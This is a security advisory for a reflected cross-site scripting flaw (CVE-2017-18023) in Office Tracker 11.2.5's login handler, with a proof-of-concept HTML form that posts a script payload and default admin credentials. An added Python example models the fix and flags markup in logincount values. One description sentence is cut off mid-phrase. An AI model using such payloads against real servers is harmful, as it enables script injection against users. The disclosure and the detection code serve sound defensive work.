Office Tracker 11.2.5 Cross Site Scripting

Office Tracker version 11.2.5 suffers from a cross site scripting vulnerability.

MD5 | a458952c5d53a047d2ebccfe52183690

# Title: Office Tracker 11.2.5 - XSS

# Author: Nassim Asrir

# Contact: [email protected]

# Vendor:

# CVE: CVE-2017-18023

# Description

Office Tracker 11.2.5 has XSS via the
logincount parameter to the /otweb/OTPClientLogin URI.


# Details

The value of the logincount request parameter is copied into the HTML
document as plain text between tags. The payload
chfkh<script>alert(1)</script>p9glb was submitted in the logincount
parameter. This input was echoed unmodified in the application's


# Vulnerability Type

Cross Site Scripting (XSS)


# Attack Type



<script>history.pushState('', '', '/')</script>
<!-- PoC form: submitting it posts the logincount payload to the login
     handler; the pushState call only rewrites the address bar so the
     PoC page's own path is not shown. -->
<form action="http://server/otweb/OTPClientLogin" method="POST">
<input type="hidden" name="logincount" value="0chfkh<script>alert(1)</script>p9glb" />
<input type="hidden" name="lastname" value="MorisonM" />
<input type="hidden" name="timezone" value="" />
<input type="hidden" name="uid" value="" />
<input type="hidden" name="phone" value="false" />
<input type="hidden" name="login" value="admin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="submitbtn" value="Login" />
<input type="submit" value="Submit request" />
</form>
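Added example, not part of the advisory or of the vendor's code: it models the unencoded reflection described under Details next to an output-encoded fix, and runs a simple check over constructed POST bodies to /otweb/OTPClientLogin that flags any logincount value carrying markup. The renderer functions and the sample bodies are assumptions for illustration.

```python
import html
import re
from urllib.parse import parse_qs

# Hypothetical model of the behaviour the advisory describes: the
# logincount value is copied into the HTML document as plain text
# between tags without any encoding.
def render_vulnerable(logincount):
    return "<p>Login count: " + logincount + "</p>"

# Hardened counterpart: HTML-encode the value before it enters the
# markup, so a reflected value can never open or close a tag.
def render_hardened(logincount):
    return "<p>Login count: " + html.escape(logincount, quote=True) + "</p>"

# Any opening or closing tag, e.g. <script> or </script>.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")

def contains_markup(value):
    return bool(TAG_RE.search(value))

def markup_in_param(raw_body, param="logincount"):
    """Parse a form-encoded POST body and return the values of `param`
    that contain HTML tags (the condition the advisory's PoC relies on)."""
    fields = parse_qs(raw_body, keep_blank_values=True)
    return [v for v in fields.get(param, []) if contains_markup(v)]

def flag_suspicious(bodies):
    """Indices of logged request bodies whose logincount carries markup."""
    return [i for i, body in enumerate(bodies) if markup_in_param(body)]

# Constructed sample of POST bodies to /otweb/OTPClientLogin (not real
# captured traffic). The second one carries the advisory's PoC payload,
# URL-encoded as a browser would send it.
SAMPLE_BODIES = [
    "logincount=0&lastname=MorisonM&login=admin&password=admin&submitbtn=Login",
    "logincount=0chfkh%3Cscript%3Ealert(1)%3C%2Fscript%3Ep9glb"
    "&lastname=MorisonM&login=admin&password=admin&submitbtn=Login",
]

if __name__ == "__main__":
    payload = "0chfkh<script>alert(1)</script>p9glb"
    print(render_vulnerable(payload))      # tag reaches the browser intact
    print(render_hardened(payload))        # tag is neutralised as &lt;script&gt;
    print(flag_suspicious(SAMPLE_BODIES))  # [1]
```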

